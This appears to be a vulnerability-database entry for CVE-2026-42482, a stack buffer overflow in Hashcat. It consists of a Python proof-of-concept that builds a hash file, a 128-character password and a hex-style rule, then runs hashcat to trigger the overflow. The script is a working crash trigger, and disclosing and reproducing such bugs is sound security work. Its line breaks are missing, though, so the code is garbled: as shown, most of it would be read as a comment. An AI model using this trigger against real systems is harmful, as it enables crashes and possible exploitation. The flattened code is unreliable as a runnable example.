CVE-2026-42482 Hashcat栈缓冲区溢出漏洞

#!/usr/bin/env python3 import subprocess import os # Create a dummy hash file (MD5 example) hash_content = "5d41402abc4b2a76b9719d911017c592:test_password" with open("hashes.txt", "w") as f: f.write(hash_content) # Create a long password candidate (128+ chars) to trigger the overflow # The vulnerability states 128 chars is the threshold long_password = "A" * 128 with open("passwords.txt", "w") as f: f.write(long_password) # Create a rule that triggers mangle_to_hex_lower/upper # Rule 'x' converts to hex, which triggers the vulnerable function with open("rule.rule", "w") as f: f.write("x") # Command to trigger the vulnerability # Assuming hashcat is installed and in PATH # Use -r to load the rule file print("Attempting to trigger the buffer overflow...") try: # Note: This may crash the application cmd = ["hashcat", "-a", "0", "-r", "rule.rule", "hashes.txt", "passwords.txt"] subprocess.run(cmd, check=False) except FileNotFoundError: print("hashcat executable not found.") # Cleanup os.remove("hashes.txt") os.remove("passwords.txt") os.remove("rule.rule")